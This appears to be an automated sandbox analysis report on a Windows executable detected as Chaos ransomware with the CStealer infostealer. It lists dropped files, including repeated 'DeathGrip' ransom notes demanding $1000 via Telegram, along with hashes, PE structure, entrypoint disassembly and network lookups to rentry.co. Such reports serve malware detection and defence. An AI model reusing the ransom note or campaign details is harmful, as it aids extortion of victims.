                                                          Preview:..............,.)i..-V...8C|E.u......c...V...!..u>?~...6...\.0#.....l...t...~.....7.[....;}...l..|j.,.d.$U....k....2%.d..p..H.`...Z3.J\...M0...+...|.+W$.y.Nr...'.....0g.]....>'.J......2../6M..-....I.H.-..R.:+.Q.w.L.K_...)0.M..C.......y..j...}.Xa...t..F....}.,....*[........3....z.<i..[`.A.p@].H..y.....^.e..+6.6...k....S....z.....X$..@.L...}...!..7..%...\.K.e.....t..l#)=BJ).%7..T...Y'yy..Ob.K..U.....s....m.}.x..9SA.F.4..T.\.....:...oReS..X...l...U.I.3......P.T...}.t.jy..t.3.x.@y$....\.....#..c..).Q['F........z..f............`..[J{.E\.@..P..]B...Q. ...fINr......N"....>...o/.N... E.^g.....e..Gd{..<.......w.....vt.j......0...ti.+...j..gf.....'..K.w.D..a..T[..^?IH9.=.Da~\.z.`2i.......(...?.9Vr..........w.......#.V..$-3?.+z..,{...j.*OqT ....>..,b..k..t2...@A.n..i5. J....JP.V.&.Nb.6dJM.b.2."l.:LI+.g..Q.............V..Q....cH0....-{.[..y..;X.-.S.TK.5..4.YW..t.....M1Q~Y.5....9Xe...~e(@>.B-D..7/.H."..P.D...j.A.CB..F..~....6%....s...jA.....

                                                          C:\Users\jones\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\jones\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\jones\AppData\Roaming\Microsoft\Windows\Start Menu\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\jones\Saved Games\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\jones\Searches\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Windows\Logs\WindowsBackup\WBEngine.0.etl

                                                          Download File
                                                          Process:C:\Windows\System32\wbadmin.exe
                                                          File Type:dBase III DBT, version number 0, next free block index 10240, 1st item " @2_"
                                                          Category:dropped
                                                          Size (bytes):30720
                                                          Entropy (8bit):1.9139032443475696
                                                          Encrypted:false
                                                          SSDEEP:96:B/MZNGb/rZ6Oh5qh212AmSNUBblqUB26klXFp:kopuh2sAvNUBblqUB26klXFp
                                                          MD5:E2ED346EC941D3A3642ADEF82020FE74
                                                          SHA1:49E9138E4E72B3499B12F216E0288405C23135F2
                                                          SHA-256:82CBAE745CFE62F8A447BB3783AD3DB16D473AA3CD76D672D916F15964576E1C
                                                          SHA-512:31931BD3D2EBC0FDCF22CC976A997B4EE4D3003CB361BBA5C90BD00B2463275DCB313C183C082D5A707FB31FE29C1F3E5EBE6A0B10AD304208F46839685B1CD6
                                                          Malicious:false
                                                          Preview:.(..@...@...........................................!............................... ... @2_.............(......eJ......._x.....Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1.............................................................D.f.............M.............W.B.E.n.g.i.n.e...C.:.\.W.i.n.d.o.w.s.\.L.o.g.s.\.W.i.n.d.o.w.s.B.a.c.k.u.p.\.W.B.E.n.g.i.n.e...0...e.t.l...........P.P..... ... @2_................................................................8.B. @2_....19041.1.amd64fre.vb_release.191206-1406.....-.@. @2_....I:...S%9.`...'.R....uudf.pdb........0.@. @2_......B..,`..9..4.....ifsutil.pdb.....1.@. @2_...........1$OI"......wbengine.pdb............,.@. @2_...............'"a.-....spp.pdb...........@. @2_.....T.c..i.\.C.s"8@....vssvc.pdb......./.@. @2_....W.p.D.......]....vssapi.pdb......-.@. @2_.....\..Q....T*&.......udfs.pdb........0.@. @2_.....2.R.+..

                                                          C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                          Download File
                                                          Process:C:\Windows\System32\svchost.exe
                                                          File Type:JSON data
                                                          Category:dropped
                                                          Size (bytes):55
                                                          Entropy (8bit):4.306461250274409
                                                          Encrypted:false
                                                          SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                          MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                          SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                          SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                          SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                          Malicious:false
                                                          Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                          \Device\ConDrv

                                                          Download File
                                                          Process:C:\Windows\System32\wbem\WMIC.exe
                                                          File Type:ASCII text, with CRLF, CR line terminators
                                                          Category:dropped
                                                          Size (bytes):48
                                                          Entropy (8bit):4.305255793112395
                                                          Encrypted:false
                                                          SSDEEP:3:8yzGc7C1RREal:nzGtRV
                                                          MD5:6ED2062D4FB53D847335AE403B23BE62
                                                          SHA1:C3030ED2C3090594869691199F46BE7A9A12E035
                                                          SHA-256:43B5390113DCBFA597C4AAA154347D72F660DB5F2A0398EB3C1D35793E8220B9
                                                          SHA-512:C9C302215394FEC0B38129280A8303E0AF46BA71B75672665D89828C6F68A54E18430F953CE36B74F50DC0F658CA26AC3572EA60F9E6714AFFC9FB623E3C54FC
                                                          Malicious:false
                                                          Preview:ERROR:...Description = Initialization failure...

                                                          Static File Info

                                                          General

                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Entropy (8bit):7.9986130392653
                                                          TrID:
                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                          • DOS Executable Generic (2002/1) 0.02%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                          File name:4wx72yFLka.exe
                                                          File size:18'377'488 bytes
                                                          MD5:fe194bd31f2388a09bbef24ddaa212ce
                                                          SHA1:cb01c1cb0a2fc192c28b3d7864e739d9d8575e08
                                                          SHA256:7737fb5fa7440206dbbd7dbeb8222a2851caf6210005e37d6d5d765081940e9a
                                                          SHA512:c682844cbe5899465e6ba14304a7d6cdfabb41c2f31c94e0407af953cf9889ed70da6a27615d868e2e9fa7f3711db488741c3cd68789a5ed7ac4fb1a60478054
                                                          SSDEEP:393216:2VVC+w99uPfkiyV4wqWisNWhQkUS9O6OKpsSH+sWTF:2m/fiyyFWFN7kJOKpsk+sWJ
                                                          TLSH:DA07331AB2F0DC75D07214731026FB0C592A7C984B7A44CA779C8C3EEED66608B3769B
                                                          File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$............s...s...s....V..s....T.&s....U..s..(.Z..s..(....s..(....s..(....s....$..s....4..s...s...r..&....s..&....s..&.X..s..&....s.

                                                          File Icon

                                                          Icon Hash:0f73e9ccec717117

                                                          Static PE Info

                                                          General

                                                          Entrypoint:0x4205e0
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x63EE221D [Thu Feb 16 12:31:25 2023 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:5
                                                          OS Version Minor:1
                                                          File Version Major:5
                                                          File Version Minor:1
                                                          Subsystem Version Major:5
                                                          Subsystem Version Minor:1
                                                          Import Hash:aac51396886833dc961fcd7aab7711e4

                                                          Entrypoint Preview

                                                          Instruction
                                                          call 00007FE608FD3A3Bh
                                                          jmp 00007FE608FD33EDh
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          push 004238E0h
                                                          push dword ptr fs:[00000000h]
                                                          mov eax, dword ptr [esp+10h]
                                                          mov dword ptr [esp+10h], ebp
                                                          lea ebp, dword ptr [esp+10h]
                                                          sub esp, eax
                                                          push ebx
                                                          push esi
                                                          push edi
                                                          mov eax, dword ptr [004407A8h]
                                                          xor dword ptr [ebp-04h], eax
                                                          xor eax, ebp
                                                          push eax
                                                          mov dword ptr [ebp-18h], esp
                                                          push dword ptr [ebp-08h]
                                                          mov eax, dword ptr [ebp-04h]
                                                          mov dword ptr [ebp-04h], FFFFFFFEh
                                                          mov dword ptr [ebp-08h], eax
                                                          lea eax, dword ptr [ebp-10h]
                                                          mov dword ptr fs:[00000000h], eax
                                                          ret
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          mov ecx, dword ptr [ebp-10h]
                                                          mov dword ptr fs:[00000000h], ecx
                                                          pop ecx
                                                          pop edi
                                                          pop edi
                                                          pop esi
                                                          pop ebx
                                                          mov esp, ebp
                                                          pop ebp
                                                          push ecx
                                                          ret
                                                          push ebp
                                                          mov ebp, esp
                                                          sub esp, 0Ch
                                                          lea ecx, dword ptr [ebp-0Ch]
                                                          call 00007FE608FC6401h
                                                          push 0043D14Ch
                                                          lea eax, dword ptr [ebp-0Ch]
                                                          push eax
                                                          call 00007FE608FD6095h
                                                          int3
                                                          jmp 00007FE608FD7F68h
                                                          push ebp
                                                          mov ebp, esp
                                                          and dword ptr [00463D58h], 00000000h
                                                          sub esp, 24h
                                                          or dword ptr [004407A0h], 01h
                                                          push 0000000Ah
                                                          call dword ptr [004341C0h]
                                                          test eax, eax
                                                          je 00007FE608FD3722h
                                                          and dword ptr [ebp-10h], 00000000h
                                                          xor eax, eax
                                                          push ebx
                                                          push esi
                                                          push edi
                                                          xor ecx, ecx
                                                          lea edi, dword ptr [ebp-24h]

                                                          Rich Headers

                                                          Programming Language:
                                                          • [ C ] VS2008 SP1 build 30729
                                                          • [IMP] VS2008 SP1 build 30729

                                                          Data Directories

                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x3e2e00x34.rdata
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x3e3140x50.rdata
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x660000x79f8.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x6e0000x23ac.reloc
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x3c1b00x54.rdata
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x366a80x40.rdata
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT0x340000x278.rdata
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3d85c0x120.rdata
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                          Sections

                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          .text0x10000x32c1c0x32e00a1ba412b9e1884abc6d558ab47956164False0.5910002687346437data6.697107176948733IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                          .rdata0x340000xb1300xb200e8a43ec311a1dd8d79c08d2904e6baa9False0.4591818820224719data5.257834305517335IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .data0x400000x247500x12000328c3d939c05c71c4948de3b281e0a8False0.4058159722222222data4.083983051040627IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .didat0x650000x1900x200a0c9db934b14102cc1f3554d5b03e4a9False0.44921875data3.372762520317566IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .rsrc0x660000x79f80x7a00fb6329ab7ec146626a768403b53fb539False0.772797131147541data7.18999435974827IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .reloc0x6e0000x23ac0x2400bca9bb68b94ec3a66ae1197cf37f5016False0.7834201388888888data6.644075573908012IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                          Resources

                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                          PNG0x665240xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States1.0027729636048528
                                                          PNG0x6706c0x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States0.9363390441839495
                                                          RT_ICON0x686180x3091PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced1.0003217244430145
                                                          RT_DIALOG0x6b6ac0x286dataEnglishUnited States0.5092879256965944
                                                          RT_DIALOG0x6b9340x13adataEnglishUnited States0.60828025477707
                                                          RT_DIALOG0x6ba700xecdataEnglishUnited States0.6991525423728814
                                                          RT_DIALOG0x6bb5c0x12edataEnglishUnited States0.5927152317880795
                                                          RT_DIALOG0x6bc8c0x338dataEnglishUnited States0.45145631067961167
                                                          RT_DIALOG0x6bfc40x252dataEnglishUnited States0.5757575757575758
                                                          RT_STRING0x6c2180x1e2dataEnglishUnited States0.3900414937759336
                                                          RT_STRING0x6c3fc0x1ccdataEnglishUnited States0.4282608695652174
                                                          RT_STRING0x6c5c80x1b8dataEnglishUnited States0.45681818181818185
                                                          RT_STRING0x6c7800x146dataEnglishUnited States0.5153374233128835
                                                          RT_STRING0x6c8c80x46cdataEnglishUnited States0.3454063604240283
                                                          RT_STRING0x6cd340x166dataEnglishUnited States0.49162011173184356
                                                          RT_STRING0x6ce9c0x152dataEnglishUnited States0.5059171597633136
                                                          RT_STRING0x6cff00x10adataEnglishUnited States0.49624060150375937
                                                          RT_STRING0x6d0fc0xbcdataEnglishUnited States0.6329787234042553
                                                          RT_STRING0x6d1b80xd6dataEnglishUnited States0.5747663551401869
                                                          RT_GROUP_ICON0x6d2900x14data1.05
                                                          RT_MANIFEST0x6d2a40x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3957333333333333

                                                          Imports

                                                          DLLImport
                                                          KERNEL32.dllGetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, GetCurrentProcessId, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetTimeFormatW, GetDateFormatW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapReAlloc, HeapAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
                                                          OLEAUT32.dllSysAllocString, SysFreeString, VariantClear
                                                          gdiplus.dllGdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree

                                                          Possible Origin

                                                          Language of compilation systemCountry where language is spokenMap
                                                          EnglishUnited States

                                                          Network Behavior

                                                          Network Port Distribution

                                                          TCP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Sep 4, 2024 14:26:38.454030991 CEST49705443192.168.2.8104.26.3.16
                                                          Sep 4, 2024 14:26:38.454075098 CEST44349705104.26.3.16192.168.2.8
                                                          Sep 4, 2024 14:26:38.454154968 CEST49705443192.168.2.8104.26.3.16
                                                          Sep 4, 2024 14:26:39.830923080 CEST49705443192.168.2.8104.26.3.16
                                                          Sep 4, 2024 14:26:39.830950975 CEST44349705104.26.3.16192.168.2.8
                                                          Sep 4, 2024 14:26:40.509557962 CEST44349705104.26.3.16192.168.2.8
                                                          Sep 4, 2024 14:26:40.713016033 CEST49705443192.168.2.8104.26.3.16
                                                          Sep 4, 2024 14:26:40.722836018 CEST49705443192.168.2.8104.26.3.16
                                                          Sep 4, 2024 14:26:40.722855091 CEST44349705104.26.3.16192.168.2.8
                                                          Sep 4, 2024 14:26:40.724359989 CEST44349705104.26.3.16192.168.2.8
                                                          Sep 4, 2024 14:26:40.724374056 CEST44349705104.26.3.16192.168.2.8
                                                          Sep 4, 2024 14:26:40.724442959 CEST49705443192.168.2.8104.26.3.16
                                                          Sep 4, 2024 14:26:40.725778103 CEST49705443192.168.2.8104.26.3.16
                                                          Sep 4, 2024 14:26:40.725888014 CEST49705443192.168.2.8104.26.3.16

                                                          UDP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Sep 4, 2024 14:26:38.443161964 CEST6498053192.168.2.81.1.1.1
                                                          Sep 4, 2024 14:26:38.450166941 CEST53649801.1.1.1192.168.2.8

                                                          DNS Queries

                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          Sep 4, 2024 14:26:38.443161964 CEST192.168.2.81.1.1.10xfe35Standard query (0)rentry.coA (IP address)IN (0x0001)false

                                                          DNS Answers

                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          Sep 4, 2024 14:26:38.450166941 CEST1.1.1.1192.168.2.80xfe35No error (0)rentry.co104.26.3.16A (IP address)IN (0x0001)false
                                                          Sep 4, 2024 14:26:38.450166941 CEST1.1.1.1192.168.2.80xfe35No error (0)rentry.co104.26.2.16A (IP address)IN (0x0001)false
                                                          Sep 4, 2024 14:26:38.450166941 CEST1.1.1.1192.168.2.80xfe35No error (0)rentry.co172.67.75.40A (IP address)IN (0x0001)false

                                                          Statistics

                                                          CPU Usage

                                                          Click to jump to process

                                                          Memory Usage

                                                          Click to jump to process

                                                          High Level Behavior Distribution

                                                          Click to dive into process behavior distribution

                                                          Behavior

                                                          Click to jump to process

                                                          System Behavior

                                                          General

                                                          Target ID:0
                                                          Start time:08:26:25
                                                          Start date:04/09/2024
                                                          Path:C:\Users\user\Desktop\4wx72yFLka.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\4wx72yFLka.exe"
                                                          Imagebase:0x40000
                                                          File size:18'377'488 bytes
                                                          MD5 hash:FE194BD31F2388A09BBEF24DDAA212CE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Chaos_1, Description: Yara detected Chaos Ransomware, Source: 00000000.00000003.1451758273.0000000006A50000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:low
                                                          Has exited:true

                                                          General

                                                          Target ID:2
                                                          Start time:08:26:28
                                                          Start date:04/09/2024
                                                          Path:C:\Users\user\Desktop\Mai.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\user\Desktop\Mai.exe"
                                                          Imagebase:0x7ff6dd650000
                                                          File size:17'965'330 bytes
                                                          MD5 hash:14F564392EEC0B9EDA9530411159057C
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:true

                                                          General

                                                          Target ID:3
                                                          Start time:08:26:28
                                                          Start date:04/09/2024
                                                          Path:C:\Users\user\Desktop\main.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\user\Desktop\main.exe"
                                                          Imagebase:0x130000
                                                          File size:1'357'824 bytes
                                                          MD5 hash:840EB9E50C131322605C5EA90AE1312F
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Chaos_1, Description: Yara detected Chaos Ransomware, Source: 00000003.00000002.1536320956.00000000126E8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Chaos_1, Description: Yara detected Chaos Ransomware, Source: 00000003.00000000.1465048212.0000000000132000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                          Reputation:low
                                                          Has exited:true

                                                          General

                                                          Target ID:4
                                                          Start time:08:26:32
                                                          Start date:04/09/2024
                                                          Path:C:\Users\user\Desktop\Mai.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\user\Desktop\Mai.exe"
                                                          Imagebase:0x7ff6dd650000
                                                          File size:17'965'330 bytes
                                                          MD5 hash:14F564392EEC0B9EDA9530411159057C
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_CStealer, Description: Yara detected CStealer, Source: 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CStealer, Description: Yara detected CStealer, Source: 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CStealer, Description: Yara detected CStealer, Source: 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
